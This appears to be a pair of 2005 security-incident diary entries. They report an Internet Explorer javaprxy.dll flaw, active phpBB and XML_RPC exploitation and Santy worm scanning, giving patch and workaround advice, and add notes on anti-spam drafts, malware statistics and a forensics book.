Swa Frantzen
Published: 2005-07-02

New IE Exploit PoC; phpBB notes; new book

New IE Exploit PoC



On Thursday, Microsoft released a describing a new unpatched vulnerability in javaprxy.dll. FrSIRT also released a bulletin yesterday. Microsoft updated their bulletin last night with some additional workarounds including requiring prompting for all ActiveX controls and/or disabling the javaprxy entirely. For those of you who must continue to use IE as a browser, we highly recommend that you look at these workarounds. This morning the folks at FrSIRT released a proof-of-concept that results in a shell open on a high TCP port, so we expect active exploitation attempts in the very near future.

phpBB notes


In case it wasn't clear in our diaries earlier this week, we are seeing active exploit attempts against the viewtopic vulnerability in phpBB 2.0.15, so if you haven't upgraded to 2.0.16, you need to do so immediately.

New book: Forensics


This isn't really a book review, but I picked up the latest (I believe) book in the Hacking Exposed series, Hacking Exposed Computer Forensics. So far, as with all the others that I've read in the series, it seems very well done with a lot of excellent information. Speaking of forensics, there was an interesting comment made on the forensics mailing list, I'm wondering what others think. Tobin Craig states "Can I suggest that the proliferation of substandard [forensic] examiners is the result of
treating computer forensics as an offshoot of information security?" and "Perhaps it might be
time for the information security arena to stop regarding computer forensics as
a subset of IT investigation, and see it instead as a completely separate
entity." I'm not sure that I entirely agree (nor entirely disagree) with these sentiments, but I'd like to hear from our readers.

Happy Holidays


To our Canadian friends, I hope you had a great holiday yesterday. For our American readers, I hope Monday is a great day for barbecues and fireworks.

Obligatory Tour de France comment: Also, congrats to Lance on an excellent prologue (a strong second place), I doubt that this is where Jan planned to be as the Tour begins. Ah, well. The next 3 weeks should be fun.


-----------------------

Jim Clausing, gro.snas.csi@gnisualcj
Published: 2005-07-01

Be on the Lookout for PHP compromises; Will New Anti-Spam Protocols Work?; Internet Survival Time by Sophos; phpBB: anti santy worm again ?

Late edition (Kyle Haugsness on duty):

Team Effort Today



Today's shift was really a team effort. Thanks to Swa, Lorna, Deb,
and Scott for covering different hours of the day. -Kyle



Be on the Lookout for PHP compromises



This is a call to all the network and system security folks out there...
Please be on the lookout for web-based intrusions happening in your
environments. There have recently been major vulnerabilities discovered
in phpBB and the XML_RPC libraries, which we have reported in the last
two days.



It's very likely that these vulnerabilities will be utilized to
compromise systems. Try to be vigilant about securing your environment
and reviewing your IDS alerts for attacks.



Will New Anti-Spam Protocols Work?



Not to be negative or anything... But it appears that the SPF (Sender
Policy Framework) and Sender-ID anti-spam approaches have been approved
as "experimental drafts" by IETF. So there is a new poll on the right
with my question. How long before the spammers defeat these methods?



Here are the relevant links:

SPF: http://www.ietf.org/internet-drafts/draft-schlitt-spf-classic-02.txt

SPF status:
https://datatracker.ietf.org/public/pidtracker.cgi?command=view_id&dTag=12662&rfc_flag=0




Sender-ID:
http://www.ietf.org/internet-drafts/draft-lyon-senderid-core-01.txt

Sender-ID status:
https://datatracker.ietf.org/public/pidtracker.cgi?command=view_id&dTag=12542&rfc_flag=0




Internet Survival Time by Sophos



Anti-virus company Sophos published their own statistic regarding
"internet survival time". Their number was 12 minutes. The survival
time currently reported by dshield.org is 31 minutes. Their story also
has some interesting statistics on the number of viruses in the first
half of 2005 compared to last year. But don't let it spoil your
weekend. If you are in the security field professionally, just think of
it as job security.



http://www.sophos.com/pressoffice/pressrel/uk/midyearroundup2005.html


Early edition

See also the

phpBB: anti santi worm resurrection?



With the release of the latest phpBB patch, we are seeing a reappearance of what looks like anti santi worm scanning for vulnerable hosts.

If you have been broken into using this method in the recent days we'd love to have a look at the dropped files to see it this is still the anti santy worm or something using the same scanning engine.

(Swa Frantzen on early duty)